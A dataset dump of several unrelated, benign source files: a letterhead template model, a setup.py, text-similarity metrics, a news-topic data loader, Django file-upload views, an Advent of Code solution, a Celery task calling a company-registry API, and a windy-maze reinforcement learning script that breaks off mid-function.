builder.letterhead_root = page.div(style=\"\"\"position:absolute;\n top:%imm;\n left:%imm;\n right:%imm;\n bottom:%imm;\"\"\" % (\n builder.page_margin_top, builder.page_margin_left,\n builder.page_margin_right, builder.page_margin_bottom))\n\n for i,pkey in enumerate(letterhead_pkeys):\n regions = self.letterhead_layer(builder, Bag(f[pkey]['data']),width=width,height=height,count=i)\n builder._regions = regions\n regions['center_center'].attributes['content_node'] ='t'\n return builder\n \n def letterhead_layer(self,builder,letterheadBag,width=None,height=None,count=None):\n layout = builder.letterhead_root.layout(top=0,left=0,border=0,width=width,height=height,z_index=count)\n regions = dict(center_center=layout)\n if letterheadBag['main.design'] == 'headline':\n for region in ('top', 'center', 'bottom'):\n height = float(letterheadBag['layout.%s?height' % region] or 0)\n if region == 'center' or height:\n row = layout.row(height=height)\n for subregion in ('left', 'center', 'right'):\n width = float(letterheadBag['layout.%s.%s?width' % (region, subregion)] or 0)\n if subregion == 'center' or width:\n innerHTML = letterheadBag['layout.%s.%s.html' % (region, subregion)] or None\n if innerHTML:\n innerHTML = \"%s::HTML\" % innerHTML\n regions['%s_%s' % (region, subregion)] = row.cell(content=innerHTML, width=width, border=0,\n overflow='hidden')\n elif letterheadBag['main.design'] == 'sidebar':\n mainrow = layout.row(height=0)\n for region in ('left', 'center', 'right'):\n width = float(letterheadBag['layout.%s?width' % region] or 0)\n if region == 'center' or width:\n col = mainrow.cell(width=width, border=0).layout()\n for subregion in ('top', 'center', 'bottom'):\n height = float(letterheadBag['layout.%s.%s?height' % (region, subregion)] or 0)\n if subregion == 'center' or height:\n row = col.row(height=height)\n innerHTML = letterheadBag['layout.%s.%s.html' % (region, subregion)] or None\n if innerHTML:\n innerHTML = \"%s::HTML\" % innerHTML\n regions['%s_%s' % (region, subregion)] = row.cell(content=innerHTML, border=0,overflow='hidden')\n return regions\n\n\n def onDuplicating(self,record):\n record['name'] = '%s (copy)' %record['name']\n\n def updateCenterSize(self,record):\n pass\n \n def trigger_onInserting(self,record):\n self.updateCenterSize(record)\n\n def trigger_onUpdating(self,record=None,old_record=None):\n self.updateCenterSize(record)\n\n \n def use_dbstores(self,forced_dbstore=None, env_forced_dbstore=None,**kwargs):\n return True\n","repo_name":"genropy/genropy_saved","sub_path":"projects/gnrcore/packages/adm/model/htmltemplate.py","file_name":"htmltemplate.py","file_ext":"py","file_size_in_byte":7648,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"5837960353","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open(\"requirements.txt\", \"r\") as fh:\n requirements = fh.read().splitlines()\n\nsetuptools.setup(\n name=\"smurfs\",\n version=\"1.1.12\",\n author=\"Marco Müllner\",\n author_email=\"muellnermarco@gmail.com\",\n description=\"Smart UseR Frequency analySer, a fast and easy to use frequency analyser.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/muma7490/SMURFS\",\n install_requires=requirements,\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n entry_points={\n 'console_scripts':['smurfs = smurfs.__main__:main']\n }\n)\n","repo_name":"MarcoMuellner/SMURFS","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"1217419891","text":"import argparse\r\nimport sys\r\nimport torch\r\nfrom fuzzywuzzy import fuzz\r\nfrom textstat.textstat import textstat\r\n\r\nimport spacy\r\nfrom collections import Counter\r\nimport numpy as np\r\n\r\nnlp = spacy.load('en')\r\n\r\n\r\ndef inorder(node):\r\n tags = str(node.dep_) +\" \"\r\n #print tags, node.text\r\n if node.lefts:\r\n for n in node.lefts:\r\n tags+= inorder(n)\r\n if node.rights:\r\n for n in node.rights:\r\n tags+= inorder(n)\r\n return tags\r\n\r\ndef doc_sim(doc1,doc2):\r\n sim = doc1.similarity(doc2)\r\n return sim\r\n\r\ndef tree_sim(doc1,doc2):\r\n ino1 = \"\"\r\n ino2 = \"\"\r\n for tok in doc1:\r\n if tok.dep_==\"ROOT\":\r\n ino1 = inorder(tok)\r\n break\r\n for tok in doc2:\r\n if tok.dep_==\"ROOT\":\r\n ino2 = inorder(tok)\r\n break\r\n ts = fuzz.ratio(ino1,ino2)\r\n return ts\r\n\r\ndef sentence_stats(s1,s2):\r\n #s2 should be predictions and s1 should be source\r\n try:\r\n fkdiff = textstat.flesch_reading_ease(s2)-textstat.flesch_reading_ease(s1)\r\n except Exception:\r\n fkdiff = 0.0\r\n doc1 = nlp(s1)\r\n doc2 = nlp(s2)\r\n ts = tree_sim(doc1,doc2)/100\r\n ds = doc_sim(doc1,doc2)\r\n return (torch.FloatTensor([fkdiff,ts,ds]))\r\n\r\ndef main():\r\n # Parse command line arguments\r\n parser = argparse.ArgumentParser(description='edit distance')\r\n parser.add_argument('-i', '--input', default=sys.stdin.fileno(), help='the input file (defaults to stdin)')\r\n parser.add_argument('-src','--source',default=\"\",help='source file with which edit distance should be calculated.')\r\n args = parser.parse_args()\r\n infile = open(args.input,'r')\r\n srcfile = open(args.source,'r')\r\n inplines = [ln.strip() for ln in infile]\r\n srclines = [ln.strip() for ln in srcfile]\r\n stats = torch.FloatTensor(3).fill_(0.0)\r\n for i in range(len(inplines)):\r\n \tstats+=sentence_stats(srclines[i],inplines[i])\r\n stats=stats.div(len(inplines))\r\n print(\"(fkdiff,ts,ds) between {} and {} are: {:.4f} {:.4f} {:.4f}\".format(args.input.split(\"/\")[-1],args.source.split(\"/\")[-1]\\\r\n ,stats[0],stats[1],stats[2]))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"subramanyamdvss/UnsupNTS","sub_path":"utils/fk_ts_ds.py","file_name":"fk_ts_ds.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"5"} +{"seq_id":"21257233846","text":"import pandas as pd\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom eda_data import word_eda\n\n\ndef tokenized_dataset(dataset, tokenizer, max_len):\n tokenized_sentences = tokenizer(\n list(dataset[\"title\"]),\n return_tensors=\"pt\",\n padding=True,\n truncation=True,\n max_length=max_len,\n )\n return tokenized_sentences\n\n\nclass Headline_Dataset(Dataset):\n def __init__(self, tokenized_dataset, idx):\n self.tokenized_dataset = tokenized_dataset\n self.idx = idx\n\n def __getitem__(self, ind):\n item = {\n key: torch.tensor(val[ind]) for key, val in self.tokenized_dataset.items()\n }\n item[\"idx\"] = torch.tensor(self.idx[ind])\n return item\n\n def __len__(self):\n return len(self.idx)\n\n\ndef pororo_data(df):\n df_origin = df.loc[:, [\"index\", \"title\", \"topic_idx\"]]\n \n # 한 - 영 - 한 데이터 추가\n df_en_ko = df.loc[:, [\"index\", \"title_en_ko\", \"topic_idx\"]]\n df_en_ko.rename(columns={\"title_en_ko\": \"title\"}, inplace=True)\n\n # 한 - 일 - 한 데이터 추가\n # df_ja_ko = df.loc[:, [\"index\", \"title_ja_ko\", \"topic_idx\"]]\n # df_ja_ko.rename(columns={\"title_ja_ko\": \"title\"}, inplace=True)\n\n df_concat = pd.concat([df_origin, df_en_ko], axis=0)\n return df_concat\n\ndef gpt_plus(df) :\n gpt = pd.read_csv(\"/content/drive/MyDrive/Colab Notebooks/data/news_headline_data/gpt_it.csv\")\n gpt['topic_idx'] = 0\n gpt.rename(columns={'Unnamed: 0' : 'index'}, inplace=True)\n gpt.title = gpt.title.apply(word_eda)\n df_concat = pd.concat([df, gpt], axis=0)\n return df_concat\n\ndef split_data(train_data, train_idx, dev_idx, tokenizer, config):\n train_dataset = train_data.loc[train_idx]\n dev_dataset = train_data.loc[dev_idx]\n if config.translate == 1:\n train_dataset = pororo_data(train_dataset)\n if config.gpt_data == 1 :\n train_dataset = gpt_plus(train_dataset) # gpt 파일 추가 삭제해도됨\n train_label = train_dataset.topic_idx.values\n dev_label = dev_dataset.topic_idx.values\n tokenized_trainset = tokenized_dataset(train_dataset, tokenizer, config.max_len)\n tokenized_devset = tokenized_dataset(dev_dataset, tokenizer, config.max_len)\n trainset = Headline_Dataset(tokenized_trainset, train_label)\n devset = Headline_Dataset(tokenized_devset, dev_label)\n train_loader = DataLoader(\n trainset,\n batch_size=config.batch_size,\n num_workers=config.num_worker,\n shuffle=True,\n )\n dev_loader = DataLoader(\n devset,\n batch_size=config.batch_size,\n num_workers=config.num_worker,\n shuffle=False,\n )\n return train_loader, dev_loader\n\n\ndef test_dataloader(test_data, tokenizer, config):\n test_data[\"idx\"] = 0\n test_dataset = test_data\n test_dataset = tokenized_dataset(test_dataset, tokenizer, config.max_len)\n test_dataset = Headline_Dataset(test_dataset, test_data.idx.values)\n test_loader = DataLoader(test_dataset, batch_size=config.batch_size, shuffle=False)\n return test_loader\n","repo_name":"KimJinHye0n/News_Topic_Classification_Dacon","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"18154380718","text":"from django.shortcuts import render\nfrom .models import FileObject\nfrom social_django.models import UserSocialAuth\n# from social_django \nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\ndef home(request):\n object_list = None\n if request.user.is_authenticated:\n object_list = FileObject.objects.filter(owner__username=request.user.username)\n if request.user.username == 'admin':\n object_list = FileObject.objects.all()\n return render(request, 's3objects/home.html', {'object_list': object_list})\n\n\ndef account(request):\n user_list = UserSocialAuth.objects.all()\n return render(request, 's3objects/account.html', {'sau': user_list})\n\n\nfrom django import forms\nfrom django.http import HttpResponseRedirect\n\n\nclass S3ObjectForm(forms.ModelForm):\n class Meta:\n model = FileObject\n fields = ['file', 'description']\n exclude = ('owner',)\n\n\ndef uploadFile(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = S3ObjectForm(request.POST, request.FILES)\n if form.is_valid():\n new_s3object = form.save(commit=False)\n new_s3object.owner = request.user\n new_s3object = form.save()\n return HttpResponseRedirect('/')\n else:\n form = S3ObjectForm()\n return render(request, 's3objects/upload.html', {'form': form})\n else:\n return HttpResponseRedirect('/login/')\n\n\ndef updateFile(request, id):\n if request.user.is_authenticated and FileObject.objects.get(pk=id).owner == request.user:\n old_file = FileObject.objects.get(pk=id)\n form = S3ObjectForm(request.POST or None, request.FILES, instance=old_file)\n if request.POST and form.is_valid():\n form.save()\n return HttpResponseRedirect('/')\n\n return render(request, 's3objects/upload.html', {'form': form})\n else:\n return HttpResponseRedirect('/login/')\n\n\ndef deleteFile(request, id):\n if request.user.is_authenticated and (FileObject.objects.get(pk=id).owner == request.user or request.user == \"admin\") :\n sel_file = FileObject.objects.get(pk=id)\n if request.method == 'POST':\n sel_file.delete()\n return HttpResponseRedirect('/')\n\n return render(request, 's3objects/delete.html', {'sel_file': sel_file})\n else:\n return HttpResponseRedirect('/login/')\n\n\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass RegistrationForm(UserCreationForm):\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email']\n\n\ndef register(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n else:\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n return HttpResponseRedirect('/')\n else:\n form = RegistrationForm()\n return render(request, 's3objects/registration/register.html', {'form': form})\n","repo_name":"TPriyanka22/CMPE281_P1","sub_path":"backend/fileUpload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11533004898","text":"#!/usr/bin/env python3\nfrom sys import argv\nfrom traceback import print_exc\n\n\ndef main():\n hands = {\"A\": 0, \"B\": 1, \"C\": 2, \"X\": 0, \"Y\": 1, \"Z\": 2}\n score = 0\n\n with open(\"input.txt\", \"r\") as file:\n for line in file:\n opp, me = line.split()\n if (hands[opp] + 1) % 3 == hands[me]:\n score += 6\n elif hands[opp] == hands[me]:\n score += 3\n # else we lost += 0\n\n score += hands[me] + 1\n\n print(score)\n\n\nif __name__ == '__main__':\n try:\n main()\n except (SystemExit, KeyboardInterrupt, GeneratorExit, Exception) as err:\n print_exc()\n\n","repo_name":"sudo-grue/aoc22","sub_path":"day02/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"16703959710","text":"import requests\nfrom celery import shared_task\n\nfrom apps.account.models import Company\nfrom apps.main.models import FnsKeys\n\n\n@shared_task\ndef check_limit_key_fns():\n \"\"\"Задача CELERY для проверки лимата по ключу в сервисе ФНС\"\"\"\n # описываем константы для настройки API\n HOST = 'https://api-fns.ru/api/stat'\n\n keys = FnsKeys.objects.all()\n for key in keys:\n params = f'?key={key}'\n url = HOST + params\n response = requests.get(url).json()\n key.response_count = int(response['Методы']['egr']['Истрачено'])\n if key.response_count >= 100:\n key.active = False\n key.save()\n return key.key\n\n\n@shared_task\ndef api_to_fns_update():\n \"\"\" Задача CELERY для обновления информации по компаниями\"\"\"\n HOST = 'https://api-fns.ru/api/egr'\n # берём первый активный ключ (активный-значит меньше 100 запросов в месяц)\n key = FnsKeys.objects.get(active=True)\n companies = Company.objects.all()\n for company in companies:\n inn = company.inn\n params = f'?req={inn}&key={key}'\n url = HOST + params\n # отправляем запрос\n response = requests.get(url).json()\n # увеличиваем счетчик запросов ключа\n key.response_count += 1\n key.save()\n # обновляем данные компании\n company.name_full = response['items'][0]['ЮЛ']['НаимПолнЮЛ']\n company.name_short = response['items'][0]['ЮЛ']['НаимСокрЮЛ']\n company.company_okopf = response['items'][0]['ЮЛ']['ОКОПФ']\n company.inn = response['items'][0]['ЮЛ']['ИНН']\n company.kpp = response['items'][0]['ЮЛ']['КПП']\n company.ogrn = response['items'][0]['ЮЛ']['ОГРН']\n company.ogrn_data_reg = response['items'][0]['ЮЛ']['ДатаРег']\n company.director = response['items'][0]['ЮЛ']['Руководитель']['ФИОПолн']\n company.adress = response['items'][0]['ЮЛ']['Адрес']['АдресПолн']\n company.save()\n return company.name_full\n\n\n","repo_name":"ITS1Lv3R/backend_bot","sub_path":"apps/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19693507260","text":"class Vehiculo:\n\tcolor = ''\n\truedas = 0\n\tpuertas = 0\n\n\nclass Coche(Vehiculo):\n\tvelocidad = 0\n\tcilindrada = 0\n\ncoche1 = Coche()\ncoche1.color = \"rojo\"\ncoche1.ruedas = 4\ncoche1.puertas = 4\ncoche1.velocidad = 50\ncoche1.cilindrada = 1500\n\nprint(\"El coche es color \"+coche1.color+\" y tiene \"+str(coche1.ruedas)+\" ruedas, \"+str(coche1.puertas)+\" puertas\")\nprint(\"El coche tiene una cilindrada de \"+str(coche1.cilindrada)+\"cc y viaja a una velociad de \"+str(coche1.velocidad)+\"km/h\")\n\n","repo_name":"jsandi321/Open-BootCamp","sub_path":"Python/Leccion06/Ejercicio01.py","file_name":"Ejercicio01.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6521669394","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport random\nimport pygame as pg\nimport seaborn as sns\nsns.set()\n\nclass enviroment_gen():\n def __init__(self, height : int, width : int, wind : list, is_random: bool = False):\n \"\"\"\n Generate a simulating environment.\n\n :param height: Maze Height;\n :param width: Maze WIDTH;\n :param wind: Winds list along the columns, hence its length should be WIDTH;\n :param is_random: whether the wind is random;\n \"\"\"\n self.HEIGHT = height\n self.WIDTH = width\n self.WIND = wind\n self.is_random = is_random\n \n # must set valid wind list\n if len(self.WIND) != self.WIDTH:\n self.WIND = [0] * self.WIDTH # reset it to zero\n print(\"Notice: Given wrong wind list, reset to zero!\")\n \n # get the environment matrix and display winodw\n self.__maze = self.visualize()\n\n # possible actions\n self.ACTION_UP = 0\n self.ACTION_DOWN = 1\n self.ACTION_LEFT = 2\n self.ACTION_RIGHT = 3\n\n def step(self, state : list, action : int):\n \"\"\"\n Generate next state based on current state and action.\n Notice that the wind affect should be based on current state, not next-state.\n Tips: we make sure that the agent will not pass-through the wall by `step(state,action)`.\n\n :param state: current state;\n :param action: action choosen;\n :return: next state (a (2,1) list);\n \"\"\"\n i, j = state\n # notice: the left corner is [0,0] and the right corner is [HEIGHT - 1, WIDTH - 1]\n if self.__maze[i,j] == -10: # you can't get to a wall state\n print(\"Something went wrong!\")\n print(i,j)\n assert False\n \n if self.is_random:\n self.WIND[j] = np.random.choice(2,1) -1 # randomly choose from {-1,0,1}\n if action == self.ACTION_UP:\n end = min(max(i - 1 - self.WIND[j], 0), self.HEIGHT - 1)\n if end <= i:\n if np.any(self.__maze[end:i + 1, j] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, j] == -10)[0][-1] # 从下往上走, 取 -1 [相对位置]\n return [min(end + 1, i), j]\n else:\n return [end,j]\n else:\n if np.any(self.__maze[i:end + 1, j] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, j] == -10)[0][0] # 从上往下走, 取 0 [相对位置]\n return [max(end - 1, i), j]\n else:\n return [end,j]\n \n elif action == self.ACTION_DOWN:\n end = max(min(i + 1 - self.WIND[j], self.HEIGHT - 1), 0)\n if end >= i:\n if np.any(self.__maze[i:end + 1, j] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, j] == -10)[0][0] # 从上往下走, 取 0\n return [max(end - 1, i), j]\n else:\n return [end, j]\n else:\n if np.any(self.__maze[end:i + 1, j] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, j] == -10)[0][-1] # 从下往上走, 取 -1\n return [min(end + 1, i), j]\n else:\n return [end, j]\n \n elif action == self.ACTION_LEFT:\n if self.__maze[i, max(j - 1, 0)] == -10:\n return [i, j]\n end = min(max(i - self.WIND[j], 0), self.HEIGHT - 1)\n if end <= i:\n if np.any(self.__maze[end:i + 1, max(j - 1, 0)] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, max(j - 1, 0)] == -10)[0][-1] # 从下往上走, 取 -1\n return [min(end + 1, i), max(j - 1, 0)]\n else:\n return [end, max(j - 1, 0)]\n else:\n if np.any(self.__maze[i:end + 1, max(j - 1, 0)] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, max(j - 1, 0)] == -10)[0][0] # 从上往下走, 取 0\n return [max(end - 1, i), max(j - 1, 0)]\n else:\n return [end, max(j - 1, 0)]\n \n elif action == self.ACTION_RIGHT:\n if self.__maze[i, min(j + 1, self.WIDTH - 1)] == -10:\n return [i, j]\n end = min(max(i - self.WIND[j], 0), self.HEIGHT - 1)\n if end <= i:\n if np.any(self.__maze[end:i + 1, min(j + 1, self.WIDTH - 1)] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, min(j + 1, self.WIDTH - 1)] == -10)[0][-1] # 从下往上走, 取 -1\n return [min(end + 1, i), min(j + 1, self.WIDTH - 1)]\n else:\n return [end, min(j + 1, self.WIDTH - 1)]\n else:\n if np.any(self.__maze[i:end + 1, min(j + 1, self.WIDTH - 1)] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, min(j + 1, self.WIDTH - 1)] == -10)[0][0] # 从上往下走, 取 0\n return [max(end - 1, i), min(j + 1, self.WIDTH - 1)]\n else:\n return [end, min(j + 1, self.WIDTH - 1)]\n else:\n assert False\n \n def visualize(self):\n \"\"\"\n Generate the MAZE. 使用说明:\n 1. 按下鼠标左键设置起点;\n 2. 按下鼠标右键设置终点;\n 3. 鼠标滚轮上滑设置路径;\n 4. 鼠标滚轮下滑设置墙(障碍物);\n\n :return: Matrix form of the `maze` environment;\n \"\"\"\n # set width and height of UI window\n window_height = self.HEIGHT*18\n window_width = self.WIDTH*18\n\n # initialize PyGame\n pg.init()\n\n # create PyGame window\n win = pg.display.set_mode((window_width,window_height))\n pg.display.set_caption(\"RL for Windy Maze\")\n\n # set drawable dimensions of each cell\n width_ = 15\n margin_ = 3\n\n # set drawable objects\n maze = [[-1 for _ in range(0, self.WIDTH)]\n for _ in range(0, self.HEIGHT)]\n grid = np.array(maze)\n\n # initialize loop for customizing maze grid\n setup = True\n self.update(grid, win, width_, margin_)\n while setup:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n setup = False\n pg.display.quit()\n pg.quit()\n \n # take user input for drawing game environment\n elif event.type == pg.MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n column = pos[0] // (width_ + margin_)\n row = pos[1] // (width_ + margin_)\n if event.button == 1: # 按下鼠标左键设置起点\n grid[row, column] = 0\n if event.button == 3: # 按下鼠标右键设置终点\n grid[row, column] = 10\n if event.button == 4: # 鼠标滚轮上滑设置路径\n grid[row, column] = -1\n if event.button == 5: # 鼠标滚轮下滑设置墙(障碍物)\n grid[row, column] = -10\n self.update(grid, win, width_, margin_)\n \n assert len(np.where(grid == 0)[0]) == 1\n assert len(np.where(grid == 10)[0]) == 1\n return grid\n \n def update(self, grid, win, width_ : int, margin_ : int):\n \"\"\"\n Visualize current MAZE based on `grid` and export it to `win`.\n\n width_ and margin_ should be constant.\n \"\"\"\n for row in range(len(grid)):\n for column in range(len(grid[row])):\n # draw cells occupied by walls\n if grid[row, column] == -10:\n pg.draw.rect(win, pg.Color(\"BLACK\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n # draw empty cells\n if grid[row, column] == -1:\n pg.draw.rect(win, pg.Color(\"White\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n # draw cells occupied by the end goal\n if grid[row, column] == 10:\n pg.draw.rect(win, pg.Color(\"Green\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n # draw cells occupied by the path finder\n if grid[row, column] == 2:\n pg.draw.rect(win, pg.Color(\"Blue\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n # Draw cells occupied by the starter\n if grid[row, column] == 0:\n pg.draw.rect(win, pg.Color(\"RED\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n pg.display.update()\n\n @property\n def maze(self):\n # forbid any outer to change maze\n return self.__maze\n\n# world height\nHEIGHT = 20\n\n# world width\nWIDTH = 20\n\n# wind strength for each column\nWIND = np.random.choice(4,WIDTH) -2 # 当风的强度小于0时候表示反向风\n#WIND = [0, 0, 0, 1, 1, 1, 2, 2, 1, 0] # most trival case\nprint(f\"Wind strength for each column is:\\n{[str(w) for w in WIND]}\")\n\n# 环境编号: 路径 = -1 / 墙体 = -10 / 起点 = 0 / 终点 = 10 / 预留可视化 = 2\nworld = enviroment_gen(HEIGHT,WIDTH,WIND,is_random = True)\n\n#%%\n# initialize PyGame\npg.init()\n# create PyGame window (18 is the size of cells and hence constant)\nWIN = pg.display.set_mode((world.WIDTH*18,world.HEIGHT*18))\npg.display.set_caption(\"RL for Windy Maze\")\n\nMAZE = world.maze # MAZE must not be changed\nMAZE_show = MAZE.copy() # copy for visualzing our path\nworld.update(MAZE, WIN, 15, 3)\nSTART = [np.where(MAZE == 0)[0][0], np.where(MAZE == 0)[1][0]] # only one START should be set\nGOAL = [np.where(MAZE == 10)[0][0], np.where(MAZE == 10)[1][0]] # only one GOAL should be set\nWALLS = [[np.where(MAZE == -10)[0][i],np.where(MAZE == -10)[1][i]] for i in range(len(np.where(MAZE == -10)[0])) ]\nACTIONS = [world.ACTION_UP, world.ACTION_DOWN, world.ACTION_LEFT, world.ACTION_RIGHT]\n\n# probability for exploration (epsilon greedy)\nEPSILON = 0.1\n# step-size\nALPHA = 0.5\n# reward for each step\nREWARD = -1.0\n# parameter for SARSA-lambda\nLAMBDA = 0.05\n\ndef choose_action(state: list, q_value : np.ndarray, epsilon : float = EPSILON, action_set : list = ACTIONS):\n \"\"\"\n choose an action based on epsilon-greedy algorithm\n\n :param state: current state;\n :param q_value: reference Q-table for updating;\n :param epsilon: probability for exploration;\n :param action_set: actions can be choosen from;\n \n :return: action to be choosed.\n \"\"\"\n if np.random.binomial(1, epsilon) == 1:\n return np.random.choice(action_set)\n else:\n values_ = q_value[state[0], state[1], :]\n return np.random.choice([action_ for action_, value_ in enumerate(values_) if value_ == np.max(values_)])\n\ndef one_episode(q_value : np.ndarray, method : str = \"SARSA\", \n epsilon : float = EPSILON, alpha : float = ALPHA, lambda_: float = LAMBDA,\n reward : float = REWARD, action_set : list = ACTIONS, start : list = START, goal : list = GOAL):\n \"\"\"\n Play one episode game based on q_value.\n Notice this function will change q_value!\n\n :param q_value: current Q-table;\n :param method: method to be used;\n :param epsilon: probability for exploration;\n :param alpha: alpha ratio for updating rule, also known as step-size;\n :param lambda_: parameter for SARSA-lambda algorithm;\n :param reward: reward for each step, assumed fixed;\n :param action_set: actions can be choosen from;\n :param start: state for start;\n :param goal: state for goal;\n \n :return: how many times it takes from START to GOAL.\n :return: the action path.\n \"\"\"\n # declare global settings for visualize\n global MAZE_show, MAZE, WIN, world\n assert method in [\"SARSA\", \"Q-learning\", \"Expect-SARSA\",\"SARSA-lambda\"]\n\n # initialize state\n state = start\n state_path = []\n\n action = choose_action(state, q_value, epsilon, action_set)\n action_path = []\n\n if method == \"SARSA-lambda\":\n trace = np.zeros((world.HEIGHT, world.WIDTH, 4)) # Eligibility Trace Initialize\n\n # keep going until get to the goal state\n while state != goal:\n if method == \"SARSA\":\n next_state = world.step(state, action)\n #print(state, action, next_state)\n next_action = choose_action(next_state, q_value, epsilon, action_set)\n target = q_value[next_state[0], next_state[1], next_action]\n\n elif method == \"Q-learning\":\n action = choose_action(state, q_value, epsilon, action_set) # action based on current state\n next_state = world.step(state, action)\n target = np.max(q_value[next_state[0], next_state[1], :])\n\n elif method == \"Expect-SARSA\":\n next_state = world.step(state, action)\n next_action = choose_action(next_state, q_value, epsilon, action_set)\n # calculate the expected value of new state\n target = 0.\n q_next = q_value[next_state[0], next_state[1], :]\n best_actions = np.argwhere(q_next == np.max(q_next))\n for action_ in action_set:\n if action_ in best_actions:\n target += ((1.0 - epsilon) / len(best_actions) + epsilon / len(action_set)) * q_value[next_state[0], next_state[1], action_]\n else:\n target += epsilon / len(action_set) * q_value[next_state[0], next_state[1], action_]\n \n elif method == \"SARSA-lambda\":\n next_state = world.step(state, action)\n next_action = choose_action(next_state, q_value, epsilon, action_set)\n target = q_value[next_state[0], next_state[1], next_action]\n\n delta = reward + target - q_value[state[0], state[1], action]\n # Update Eligibility Trace\n trace[state[0], state[1], action] += 1\n\n # Update Rule (Eligibility Trace Form)\n # Notice that the REWARD is fixed (= -1) !\n q_value += alpha * delta * trace\n trace *= lambda_\n \n # Update Rule (TD form)\n # Notice that the REWARD is fixed (= -1) !\n # Notice that the Eligibility Trace is updated in another way!\n if method != \"SARSA-lambda\":\n q_value[state[0], state[1], action] += \\\n alpha * (reward + target - q_value[state[0], state[1], action])\n \n # store actions and states\n state = next_state\n state_path.append(next_state)\n action_path.append(action)\n if method != \"Q-learning\":\n action = next_action\n\n # color the cells to illustrate path (visualize)\n MAZE_show = MAZE.copy()\n for i in state_path[:-1]:\n MAZE_show[i[0], i[1]] = 2\n world.update(MAZE_show, WIN, 15, 3)\n\n return len(action_path), action_path\n\ndef Main(EPISODE_NUM : int = 400):\n \"\"\"\n Main function.\n\n :param EPISODE_NUM: Run the MAZE learning for EPISODE_NUM times;\n :return: the action path of each given metho.\n \"\"\"\n global MAZE_show, MAZE, WIN, world\n global START, GOAL, WALLS, ACTIONS\n global EPSILON, ALPHA, REWARD\n\n # setup Q-tables and total episode num\n HEIGHT, WIDTH = world.HEIGHT, world.WIDTH\n Q_VALUES_1 = np.zeros((HEIGHT, WIDTH, 4))\n Q_VALUES_2 = np.zeros((HEIGHT, WIDTH, 4))\n Q_VALUES_3 = np.zeros((HEIGHT, WIDTH, 4))\n Q_VALUES_4 = np.zeros((HEIGHT, WIDTH, 4))\n\n sarsa_elapse = []\n qlearning_elapse = []\n Esarsa_elapse = []\n sarsaLambda_elapse = []\n result_1, result_2, result_3, result_4 = None, None, None, None\n episode_index = 0\n\n while episode_index < EPISODE_NUM:\n # let the EPSILON vary when the time elapse\n var_EPSILON = EPSILON/(episode_index + 1)\n elapse, result_1 = one_episode(Q_VALUES_1, method = \"SARSA\", epsilon = var_EPSILON)\n sarsa_elapse.append(elapse)\n elapse, result_2 = one_episode(Q_VALUES_2, method = \"Q-learning\", epsilon = var_EPSILON)\n qlearning_elapse.append(elapse)\n elapse, result_3 = one_episode(Q_VALUES_3, method = \"Expect-SARSA\", epsilon = var_EPSILON)\n Esarsa_elapse.append(elapse)\n elapse, result_4 = one_episode(Q_VALUES_4, method = \"SARSA-lambda\", epsilon = var_EPSILON)\n sarsaLambda_elapse.append(elapse)\n episode_index += 1\n \n #pg.display.quit()\n #pg.quit()\n \n plt.figure(figsize = (20,8))\n treshold = int(0.2 * EPISODE_NUM)\n plt.plot(np.arange(1, EPISODE_NUM + 1),sarsa_elapse, label = \"SARSA\")\n plt.plot(np.arange(1, EPISODE_NUM + 1),qlearning_elapse, label = \"Q-learning\")\n plt.plot(np.arange(1, EPISODE_NUM + 1),Esarsa_elapse, label = \"Expect-SARSA\")\n plt.plot(np.arange(1, EPISODE_NUM + 1),sarsaLambda_elapse, label = \"SARSA-lambda\")\n\n 